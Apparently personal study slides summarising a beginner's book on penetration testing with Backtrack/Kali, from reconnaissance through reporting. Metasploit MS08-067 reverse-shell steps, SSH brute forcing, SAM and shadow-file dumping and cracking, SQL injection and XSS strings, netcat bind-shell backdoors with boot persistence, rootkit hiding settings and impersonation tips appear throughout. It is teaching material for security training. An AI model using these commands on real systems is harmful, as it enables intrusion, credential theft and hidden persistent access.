The basics of Hacking and Penetration Testing이제 시작이야해킹과 침투 테스트

Kenneth Kwon

철통보안 시리즈 005Made in 20011

It’s based on “Backtrack 5“

Not Kali

CHAPTER 1. IntroductionAll exmaples is based on ‘Backtrack 5’

It’s original book.

White hat & Black hat• There are three big differences between them.1. Authorization2. Motivation3. Intent

Penetration testing & Vulnerability assess-ment• The difference between Penetration testing & Vulnerability as-

sessment.- Vulnerability is to check and exam services and systems- Penetration testing has more steps than Vulnerability assessment need to show how it could be abused by attackers.

Difference

Difference

Kali linux : Penetration testing Tool• Kali was called by ‘Backtrack’. But, now the name has been changed.

• Easily can download by FREE!! https://www.kali.org/downloads/ (You should download from official site for safety.)

PS. You can use any linux. But, need to setup lots of testing tools

PS. There are other linux ditributions. : Matlinux, Fedora Security Spin, KATANA, STD, Pentoo, Black-buntu etc.

You can search the internet using keyword ‘Linux Penetration Test-ing Distributions’

APT(Advanced Package Tool)• Easily, fast make us install a software by simple command prompt• Especially, with APT, can be free from “Dependency Hell problem!”

• How to use? apt-get update apt-get install [Software name] ex) apt-get install Cheops

• VMware Tools is very convenient.- Full Auto-fit screen, - Able to exchange files between real OS and VM OS.

Kali linux : Start• Logon : Default user account ID : root / PW : toor (reverse type)

• X-windows launch• root@bt~# startx• Terminal launch• #console or click icon

• Network activate• #ifconfig : show interface which you be able to use• #ifconfig eth0 up : eth0 activate(up), bacsically off state for hide of tester

• Network ip allocate• #ifconfig eth0 up 192.168.1.23 // allocate ip manually• #ifconfig // check ip setup. It’s necessary work after changing settting• Or #dhclient eth0 //allocate ip atumatically using DHCP

• Shutdown • #poweroff or #reboot // ketword is ‘reboot’. But, fuction is same with ‘poweroff’

If your NIC is off, you need to turn it on

Careful, It’s ‘ifconfig’. ‘ipconfig’ is in case of win-dows.

Penetration test Methodology • ZEH (Zero Entry Hacking : Reverse triangle step table)

Reconnaissance : 군사목적의 탐색 Scanning : Port, Vulnerability scannning

Explitation

Access Authority Holding: making ‘Backdoor’

4 Step ta-bleKeep circulating 4 steps

CHAPTER 2. Reconnaissance

Reconnaissance• Active reconnaissance Gathering information using even directly scanning and approaching. It could remain your ip and activity logs.

• Passive reconnaissance Gathering information using redirect ways ; internet, web searching, googling etc.

Reconnaissance• Active reconnaissance Gathering information using even directly scanning and approaching. It could remain your ip and activity logs.

• Passive reconnaissance Gathering information using redirect ways ; internet, web searching, googling etc.

HTTrack : website copy tool• Entirely copy a target website using HTTrack• copied : all pages, link, picture, code etc.• gather information in offline circumstance for less traces.

• Setup• Kali : # apt-get install webhttrack• Win : download ( http://www.httrack.com/ )

Google Search Tip• Search operator • “site: “• site:dsu.edu pat engebretson : search ‘pat engebretson’ in website ‘dsu.edu’• “intitle:”, “alltitle”• allintitle: index of : when webpage’s title has ‘index of’ (only all)• intitle: index of : when webpage’s title has ‘index’ or ‘of’ (or)• “inurrl:”• inurl:admin : find url which has ‘admin’ words. It’s useful to find admin page or sett-

ting page!

Google stored page• There is some stored pages. It’s collected by google’s web crawler.• These pages are based on text contents : web code, pdf, word, excel etc.• Even You deleted your data, it could be alive in google’s stored pages palce. If web

crawler collected data before you erased it.

• “cache:”• cache:syngress.com : search ‘syngress.com’ only in google’s stored pages place.

• “filytype:”• site:dsu.edu filetype:ppt : find *.ppt in site ‘dsu.edu’ (ppt, xlsx,doc,txt etc)

• % caution : when you clicked a url, it leave traces.

Harvester : tool• Python scripts• Categorize e-mail and subdomains related with target.• Harvester search data from google, bing, PGP, LinkedIn etc

• If you are not Kali, download from http://www.edge-security.com • And, #tar xf theHarvest

• Launch • find ‘TheHarvester’• or # cd /pentest/enumeration/google/theharvester• # ./thHarvester.py –d syngress.com –l 10 –b google • : search email, subdomain, host in syngress.com.• : -l(result numbers), -b(choose search engine)

Whois : tool and site• Find information of ip, host name, company address, contact number from company

DNS.• #whois syngress.com : whois [target_domain]• And go to http://www.whois.net and ‘WHOIS LOOKUP : syngress.com’

• Check ‘Referral URL: ‘

Netcraft : tool and site• http://news.netcraft.com • What’s that site running : syngress : find website which has ‘syngress’ in name• Can see ip, webserver’s OS, DNS server etc.

HOST : tool• Convert [hostname] and [IP address]• root@bt~@# host ns1.dreamhost.com : # host [target_hostname]• # host [IP address]

NS lookup• Useful tool to investigate DNS• query to DNS and get info which DNS knows

• It can be activated on interactive mode.• # nslookup• > server 8.8.8.8

Dig• Tool for gathering information from DNS.

• # dig @192.168.1.23 example.com –t AXFR• : try to DNS zone transfer(AXFR) from DNS server ‘192.168.1.23 example.com’

• AXFR works only when AXFR is available and not limited from DNS setting.• No matter is hard to success, Try it. That’s Reconnaissance process.

MetaGooFil• Same inventors who made Harvester made MetaGooFil• Find hidden data what document has automatically ; owner, writer account, stored file lo-

cation etc.

• Use• MetaGooFil Icon• or cd /pentest/enumeration/google/metagoofil• mkdir files• ./metagoofil.py –d syngress.com –f all –o results –t files• : -d (target domain), -f (file type), -o (setting name which would be made), -t (storing

location)

Social Engineering Technique.• Contact sales department person using e-mail and check e-mail’s Header.• If he is on vacation, try to pretend him. • ex) “I lost my password, would you reset for me?”

• Leave CD, USB near the company• Normally people are curious and tend to open them which could install backdoor.

Reconnaissance Tip

• Website information : merge schedule(another attack route), recruit board(System hardware info) • Use the Google! Google is web crawler.• Watch the Jonny Long’s video which can find in DefCon reference library.• Be a SNS friend. Someday you can find gold from what they saying • “I can’t go home tonight, Server is down! OMG!” like this. Sincerely it’s real.

• Mail server could be main point for attack. Because people always use e-mail for their business.• So, there are many information.• As the step of pushing, you can send ‘empty *.bat, calc.exe etc’. • Then, mail server would reject them and send back.• In that case, sometimes there are vaccine company’s name, version and etc.• Also, could check e-mail’s header(IP, specific SW version, mail server brand etc)

Extra recommend steps• SEAT(Search Engine Assessment Tool)• : use multi-serach engine at once. (www.midnightresearch.com)• GHDB(Good Hacking Database of Jonny Long) • : famous and effective website relate to hacking (www.hackersforcharity.org/dhdb)• Book : Google hacking for Penetration Testers of Jonny Long (Recommend)• Maltego CE : gather detail information from public/open based DB. This tool is easy and

very useful (included in kali)

CHAPTER 3. Scanning Steps1. Running check2. Port scanning3. Vulnerability scan-

ningPort No.20 FTP21 FTP control22 SSH23 Telnet25 SMTP(e-mail)53 DNS80 Http443 Https

FPing : Ping Sweep tool• Ping is ICMP packet• is Echo Request packet

• Ping Sweep is function which automatically sends ping to range of IP address.

• # fping –a –g 192.16.45.1 192.16.45.254>hosts.txt : -a (save only result data) –g (sweep range)

Nmap : Port scanning tool• Download (http://www.insecure.org) • TCP Scanning - #nmap –sT –p- –PN 172.16.45.135 • : -sT (TCP scanning), -P (all port scan. Not only popular 1000),• : -PN(skip running check, just try to port scan in and out of running)

• SYN Scanning is called by Stealth Scan(Not anymore. It’s old story). • It’s default setting of Nmap scanning and more fast than TCP Scanning.• #nmap –sS –p –PN 172.16.45.135

• UDP Scanning #nmap –sUV 172.16.45.129• : -sUV(UDP Scanning+Version Scanning)• UDP scanning taks long time. So, don’t use ‘–p’ , ‘-PN’. Already alomost 20min.• Version Scanning : Even port is filtered, Sometimes Version scanning could open. That’s why we use -sUV

TCP 3way hand-shaking1. SYN C to S 2. SYN, ACK S to C3. ACK C to S

Nmap : Port scanning tool• X-mas Tree Scanning #nmap –sX –p- –PN 172.16.45.129• FIN, PSH, URG flags ‘ON’. If port is closed, target sends back ‘RST packet’• If port is open, target doesn’t send anything.

• Null Scanning #nmap –sN –p- -PN 172.16.45.129• No flags. If closed, send back RST / if opened, send back nothing.

• These two techniques are started from RFC documents. • Sometimes Algorithm has vulnerability in itself.

• More options -T [0~5] : Scanning speed control for avoiding detection• -O : OS check

Nessus : Vulnerability scanning• There are others ; Core Impact, Saint / premium

• Steps• Download (http://www.nessus.org) • Type e-main in nessus website and check e-mail for product register key.• Install• Create account and access Nessus server.• Plug-In update• In Broswer, https://127.0.0.1:8834 and access Nessus.• Configuration Policies• Now, Scan vulnerability.

CHAPTER 4. Exploitation

Medusa : brute force tool • Installation # apt-get update• # apt-get install medusa (if you don’t have or if you want to update)

• Password dictionary /pentest/passwords/wordlist : bult-in word list of Kali.• /pentest/passworrds/jtr/password.lst : Jack the ripper’s word list.• Could exploit AFP, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PC Anywhere, POP3, REXEC,

RLOGIN, SMTPAUTH, SNMP, SSHv2, Telnet, VNC, Web etc.

• #medusa –h 172.16.45.129 –u ownedb –P /pentest/passwords/wordlists/drkc0de.lst –M ssh• : -h [target_IP] • : -u [user_ID] (If target account is 1), -U [account_list] (if target account are many)• : -p [single password try], -P [password list location]• : –M [Authorization service type to exploit]

Metasploit : essential tool (1/3) Introduction• Lots of people love it ! Thank you ‘HD Moore’• It’s open source exploit ‘frameworks’• Make you choose payloads you want.

• Downloads (Http://www.metasploit.com)• Excute in Kali #/pentest/exploits/framwork3/msfconsole • or ‘K-start menu’• Should see ‘msf> ‘ console screen• Update msf>msfupdate (do it everytime)

Metasploit : essential tool (2/3) Attack practice• Use Nessus for finding Vulnerability.• (Need to use all you have for exploitation.)

• If your taget didn’t update MS 08-67 or MS 09-001• msf> search ms08-67 : can get information for where is attack code and it’s rank.

• Rank system : Manual – Low – Average – Normal – Good – Great – Excelent• Higher Rank is likely to be succeed

• msf> use windows/smb/ms08_067_netapi : chose attack code which Nessus recommended• msf> show payloads : can see lists which is compatiable with used code(above).• msf> set payload windows/vncinject/reverse_tcp

Metasploit : essential tool (3/3) Attack practice• In this practice, we gonna install VNC(make them remote access to me)• msf> show options• msf> set RHOST 172.168.45.130 : target• msf> set LHOST 172.168.45.135 : attacker

• msf> expoit : Now, it’s show time! Automatically it woks!

• Summary 1. msf> msfupdate 2. “Nessus” 3. msf> search ms08_67 4. msf> use windows/smb/ms08_67 5. msf> show payloads

6. msf> set payload windows/vncinject/re-verse_tcp 7. msf> show options 8. msf> set RHOST 172.168.45.130 9. msf> set LHOST 172.168.45.130 10. msf> exploit

Metasploit : essential tool (4/4) Sample payload list• windows/adduser• windows/exec• windows/shell_bind_tcp• windows/shell_reverse_tcp• windows/meterpreter/bind_tcp• windows/meterpreter/

reverse_tcp• windows/vncinject/bind_tcp• windows/vncinject/reverse_tcp

Bind and Reverse bind : Attacker send attack code to target. Attacker access to target

Reverse : Attacker send attack code to tar-get Tagert access to Attacker

Metasploit : essential tool (4/4) Metapreter• Excuted on shell, doesn’t use Hard disk drive. So, could make you conceal more.• Get authorization of a account which the metapreter was running at that time.• Designed as a Hacking tool from the beginning.

• Command• migrate : move metapreter server to another process for avoiding power-off, service

down etc• kill : process stop• download. upload, edit, excute • ls,ps,shutdown,mkdir,pwd,ifconfig etc (normally used in linux)• As advance function, get pwd hash using SAM juicer• Ruby shell, DLL load or excute, keyboard and mouse lock etc

John the Ripper : the lord of pwd cracking• Password is important to get more authorization.• Hash coding performance test • # cd /pentest/passwords/jtr• # ./john –test

• How to get SAM(Security Account Mager; windows)• 1. Metapreter and SAM juicer in case of remote computer• 2. Dual booting as kali when you can approach physically.• # fdisk –l• # mkdir /mnt/sda1• # mount /dev/sda1 /mnt/sda1 : mount [From A] [To B], making connection route.• # cd /mnt/sda1/Windows/system32/config• # samdump2 system SAM > /tmp/hashes.txt : Decrypt SAM using system(key) and samdump2

Tip. So many times, Local Admin ac-count password is same with Network Admin password. It’s really vulnerable point. Don’t do this and attack this!

Download (http://www.openwall.com/john)

John the Ripper : the lord of pwd cracking• Previous Microsoft encryption algorithm• LM (Lan Manager)• 1. make all alphabets capital letters• 2. length is 14, all the time• 3. saved 7 and 7. it’s easier than 14 length.• Recently use NTLM, but still some OS uses LM for compatibility with old computer.

• # john : Automatically move john directory; /pentest/passwords/jtr• # ./john /tmp/hashes.txt : if target use LM• or # ./john /tmp/hases.txt -f:NT : if target use NTLM

• In linux, password hash is at ‘/etc/shadow’• # john or # cd /pentest/passwords/jtr• # ./unshadow /etc/passwd /etc/shadow > /tmp/linux_hashes.txt : combined ‘passwd’ and ‘shadow’ like ‘system’ and ‘SAM’ in

windows• # ./john /tmp/linux_hashes.txt : excute cracking

• If there is any error massage like ‘No password hashes loaded’, it’s because of ‘John the ripper version’

Password Resetting• By force, reset password.• Reset SAM files. So, it surely remains logs.• Need to approach physically.

• Boot as Kali • # fdisk –l and # mount /dev/sda1 /mnt/sda1• # cd /pentest/passwords/chntpw• # ./chntpw hn : find all available switches• # ./chntpw hi /mnt/sda1/WINDOWS/system32/config/SAM : ‘-i’ interactively• # ./chntpw –i /mnt/sda1/WINDOWS/system32/config/SAM

Macof : Network Sniffing • Make it promicuous mode, not nonpromicuous mode.• Need to make a switch into a hub by ‘fail-open’ of switch. • : In case of ‘fail-closed’, it could be service down attack.• Macof imbue thousands of MAC address to switch. • repeat commands thousands times : #macof –i eth0 172.16.45.123 –d 172.16.45.2• It’s easy to be detected. So, do this when you don’t need to care concealment.

Wireshark : Network Sniffing• Download (http://wireshark.org) : old name is ‘Ethereal’• Try to monitor FTP packet, FTP uses uncoded packet

Fast Track Auto • Automate all exploitation steps. All you need to do is just to set target’s IP address.• It doesn’t care any concealment or caution.

• How to use• ‘Penetration’ – ‘Fast Track’ - ‘Fast-Track WebGUI’ – ‘Autopwn Automation Link’ – type IP

address• # sessions –l• # sessions –i [ID]• After commands, Now metapreter is excuting in target PC

PRACTICE• Recommend Practice target• Windows XP• Metasploit Unleashed project_ setting Ubuntu 7.04(has SAMBA) • Metasploitable : download using torrent from metasploit express cummunity site • De-ICE : penetration test live Linux CD series• download (http://heorot.net/livecds/)• It couldn’t attack using only Fast-Track. So, it’s good to practice

CHAPTER 5. Web based Ex-ploitation

Intetnet gonna be more execuatable.It means internet could be exposed to critical inva-sion.

NIKTO : webserver vulnerability scanner• After Port-scanning and Discovering about port 80(http) 443(https),• NIKTO would be used for evaluating the service.

• # cd /pentest/scanners/nikto• # perl nikto.pl : see available options• # perl nikto.pl –h 172.16.45.129 –p 1-1000 –o /tmp/nikto_saves.txt • : ‘-h’ target IP, ‘-p’ port scanning, ‘-o’ save route and choose file name

•

Download (http://www.cirt.net/Nikto2)

Websecurity : Automated web vulnerability scanner• Good to figure out vulnerability point ; SQL injection, XSS, attached file etc.• ‘K-start’ – ‘Backtrack’ – ‘Web Application Analysis’ – Web(front end) - Websercurity

WebScrab : Spidering Website information collecter• Usually After Vulnerability Scanning(:Nikto and Websecurity), execute Spidering Pro-

gram(:WebScrab)• WebScrab is capable through OWSP website.

• How to use• Same route with ‘Websecurity’, just - ‘Web(front end)’ – WebScrab lite• Setup Manual proxy configuration : < IP : 127.0.0.1 (loopback), Port : 8008 >• : All web traffics gonna pass WebScrab cause of Proxy setting• : https is no more available cause of WebScrab• : Can control network traffic ; stop, monitor, manipulate • Inset URL and right-click, ‘Spider tree’• : Spdering process is good to find unintended or exposed secret information.

WebScrab : Spidering (2/2) Website information collecter• You can do ‘Packet intercept’• Execute ‘WebScrab lite’ and check box ‘Intercept requests’ and ‘Intercept responses’ in

intercept tab. : in this process, Proxy setting is necessary.• Try to change ‘Value field’.

• HTTP requests and responses are normally encoded by ‘Base64’.• : It’s not encryption. So, easy to decode using program or online-tools

SQL Injection : Injection exploitation• Modern web application uses Interpreted programming language and Back-End database, dynamic

contents interacting with Users.• Should understand lost of SQL grammar and Vendors(makers).

• when you search “laptop” in shopping mall site, it works like below.• Normal : SELECT * FROM product WHERE category=‘laptop’;• If you want to do SQL Injection, type “laptop’ or 1=1--” instead of “laptop” • SELECT * FROM product WHERE category=‘laptop’ or ‘1=1-- : the rear -- is comment

• If Account is uncertain, usually return FIRST user account and It’s DB administrator with high proba-bility.

• SELECT * FROM users WHERE uname=‘ ‘or 1=1–- and pwd=‘syngress’ : the rear -- is comment• If you knows Account name, can apply belew setence.• SELECT * FROM users WHERE uname=‘admin’ and pwd=‘ ‘ or 1=1--

XSS (Cross Site Scripting)• Inserting scripts into Web application. Those scripts works like truth-worthy website parts.• XSS focuses on Client exploitation instead of Sever (server is usual target)• After inserting scripts, User PC consider all contents are reliable. It’s really powerful exploitation.• XSS could be applicatable in website, e-mail, messenger etc.

• Usual Test way• Type <scripts>alert(“XSS Test”)</scripts>• : If website popup message ‘XSS Test’, that website is vulnerable.

• There are two major XSS exploitation. (Study by youself)• 1. Reflected cross-site scripting : Attacker sends scripts to server.• Server sends back scripts to Users.• In this case, Payload would be excuted immediately.• 2. Stored cross-site scripting : Attacker sends scripts to server.• vulnerable Server saves scripts.• It could effect all users who try to access this server.

PRACTICE• OWASP developed vulnerable platform to learn and practice web based exploitation.• “The WebGoat” project.• It’s practical and scenario based study environment. Consists of more 30 lessons.• JRE is necessary and it could be downloaded (http://owasp.org)• Setup in Virtual system. Default ID/PW is guest/guest.• Recommend that you read “readme”.

• You could know web exploitation trends on OWASP “Top Ten”• Recommend that you sign in OWASP. You can join projects and study together.

Tip. ‘Burps Suit’ , Best application testing tool which is recommended by exper hackers.

CHAPTER 6. Backdoor and Rootkit

Attackers remain Backdoor and Rootkit for holding authorization.It make them in anytime again and again.

Netcat• It can be used for file transfer, port scan, messenger.• There are two modes : Client mode and Server mode• 1. Client mode can make network connection and service with other PCs.• # nc –l –p 2323 : ‘-l’ listener mode, ‘-p’ port to wait access. ‘-L’ keep port open after dis-

connection.• # nc 172.16.45.132 2323 : It’s other PC. With this command, you can chat

• If you add Netcat to ‘HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run’ in Windows system, Netcat program would be executed every-windows boot.

• In case of Linux, it’s more difficult. You need to make Bash scripts. Find it on internet, if you want to study more.

Netcat (2/3)• When Netcat is still running• # nc –l –p 7777 > calc.exe : Receiving input would save in calc.exe• # nc 172.16.45.129 777 < calc.exe : Sending file• Netcat doesn’t let you know it’s done or not. So, disconnect ‘CTRL+C’ after a few seconds.• After seding, type ‘ls’ to check it’s done clearly.

• Sometimes it can be used for figure out which service is working (even Nmap and Nessus doesn’t do)

• # nc 172.16.45.129 50001 : See the responses, ‘-u’ UDP packet transfer.• # nc –l –p 12345 –e /bin/sh • : ‘-e [program]’ execute program, It’s powerful to setting backdoor shell. • : If anyone access using port 12345, could get shell.• In windows : # nc –l –p 12345 c:\Windows\System32\cmd.exe

Netcat (3/3)• Summary• 1. Get metapreter shell• 2. metapreter > upload nc.exe c:\\windows\\system32 ( In case of windows )• 3. metapreter > nc –L –p 5777 –e cmd.exe

CryptCAT : Netcat’s encrytion version• All Netcat’s traffics are plain texts. So, make that better. That’s CryptCat. • CryptCat uses ‘twofish encryption’• First of all, you need to change basic key ‘metallica’ using ‘-k’ option. • If you don’t do this, anybody can decrypt. So, It’s necessary.

• Server • # cryptcat –l –p 5757• Client• # cryptcat 172.16.45.129 5757 : Same grammar with Netcat.

NetBus• It’s really classic SW for backdoor and remote-control ; It was made in 1998.• Install Server part on Target and Install Client part on Attacker.

• Server (target)• execute ‘patch.exe’. Then, ‘patch.exe’ process is on your CPU • and every-time when you boot windows, it would execute automatically.

• But, it’s classic. It’s good to practice But, not good to use in real exploitation..

RootKit• It’s really powerful. You can hide your file, process and program. Sometimes even anti-

SW can’t find it.• Even rootkit can hook system call. When you press Ctrl+Alt+Del, rootkit would hide its

process.

Hacker Defender• Don’t make it trick you. It’s rootkit!• Remember : hxdef100.exe : execute Hacker Defender on target PC.• hxdef100.ini : make a list what you want to hide (programs, files, services)• bdcli100.exe : Client SW for accessing Hacker defender’s backdoor.

• How to use• 1. upload hsdef100.zip and unzip.• 2. modify hxdef100.ini to hide where it is or what you do.• [Hidden Table] : file names which you want to hide. ‘hxdef*’ : hide all files, directories which start ‘hxdef’ from file manager and windows

explorer.• [Hidden Processes] : block interaction. If you add ‘calc.exe’, users couldn’t find or use calc.exe anymore.• [Root processes] : allow full-interaction even hidden files or system files.• [Hidden services] : hide services• [Hidden RegKeys] : In almost every-case, when you install programs, Registry would be added. • So, you need to hide you Registry Keys• [Hidden RegValues] : seperately hide RegKeys.• [Startup Run] : when Hacker Defender starts, this list also would execute.• [Free Space] : add fake space volume from real rest space volume of Hard disk. Unit is ‘byte’.• [Hidden Ports] : TCPI, TCPO, UDP. I is in-port, O is out-port. You can use ‘,’ to arrange ports.

Tip. 1. You can install Netcat and hide it using Hacker Defender. Try it 2. If you want to master Rootkit, study OS kernel more and more.

How to Defend Rootkit• 1. Use Kernel-level(low level) Anti-Virus Software.• 2. Always update your Anti-Virus Software.• 3. Monitoring IN&OUT traffics and ports.• 4. Sometimes use Anti-Rootkit Software ex. Rootkit Revealer, Vice, Blacklight of F-Se-

cure• 5. Check infected OS using Normal OS.

PRACTICE• You must use Netcat once in practice!• Windows’s Netcat and Linux’s Netcat communication is available.• Try to use advanced functions of Netcat • : Proxy, Reverse shell, Port scan, Disk partition image making and copy.

• Read ‘man’ page.• When you practice Rootkit, use Virtual Machine for your safety. You should be stand-alone.

• Ncat : Current version of Netcat. It’s a part of Nmap. Added SSL&IPv6 function.• Socat : similar to Ncat. Good to read and write network-traffics.• If you want to study more about backdoor, Back-orifice(classic backdoor) and Sub 7 are nice references.• If you want to study more about Rootkit, study OS kernel.

• Before Rootkit or Backdoor, You need to get high-authorization.

CHAPTER 7. Penetration Test Report

Report of Penetration Test• At lease, These three are necessary.• 1. Test result summary• : Write down easily as possible as you can. Even history scholar could understand.• 2. Detailed result report• : Write down detailedly. This report is for similar engineers.• : Explain which critical problem could happen. Don’t focus on your achievement. • : Even you couldn’t penetrate, should write this report. Attach the result of attempts.• 3. Evidence• : attach screenshots or anything you could make them caution.• : If you don’t want to expose your special skills, you don’t need to do that. • But, at lease you should let them know which is vulnerable.• : The most important thing is to keep the secret information. It’s basic and essential. • It’s not enough to emphasize again and again.

Lastly, Before end.• Join IT security Conference once at any cost!• Join Communities : InfraGard, OWASP, Backtrack-Linux Forums etc

• More study, Here books. I just writ it down shortly.• Aggressive Network Self-Defense. By Neil R.• A Guide to kernel Exploitation. By Enrico Perla.• Managed Code Rootkits. By Erez Metula.• Nessus Network Auditing. By Russ Rogers.• Ninja hacking. By Thomas Wilhelm and Jason Andress.• PenTester’s Open Source Tookit. By Jeremy Faircloth.• Professional Penetration Testing. By Thomas Wilhelm.• Seven Deadliest Attack Series.• Stealing the Network : The complete Series. By Johnny Long